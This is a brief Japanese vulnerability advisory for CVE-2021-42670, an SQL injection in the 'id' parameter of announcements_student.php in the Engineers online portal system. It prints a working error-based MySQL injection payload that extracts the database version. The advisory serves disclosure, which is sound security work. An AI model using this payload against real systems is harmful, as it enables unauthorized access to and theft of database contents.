
CVE-2021-42670 - Engineers online portal system における SQL インジェクションの脆弱性
CVE-2021-42670 - エンジニアオンラインポータルシステムにおけるSQLインジェクションの脆弱性。
エンジニアオンラインポータルにSQLインジェクションの脆弱性が存在します。攻撃者は、「announcements_student.php」ウェブページの脆弱な「id」パラメータを利用して、実行されるSQLクエリを操作できます。 その結果、攻撃者はウェブサーバーから機密データを抽出できます。
影響を受けるコンポーネント -
脆弱なページ - announcements_student.php
脆弱なパラメータ - "id"
以下のペイロードを使用すると、ウェブサーバー上で動作しているMySQLサーバーのバージョンを抽出できます。
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42670
Alon Leviev(0xDeku), 2021年10月22日。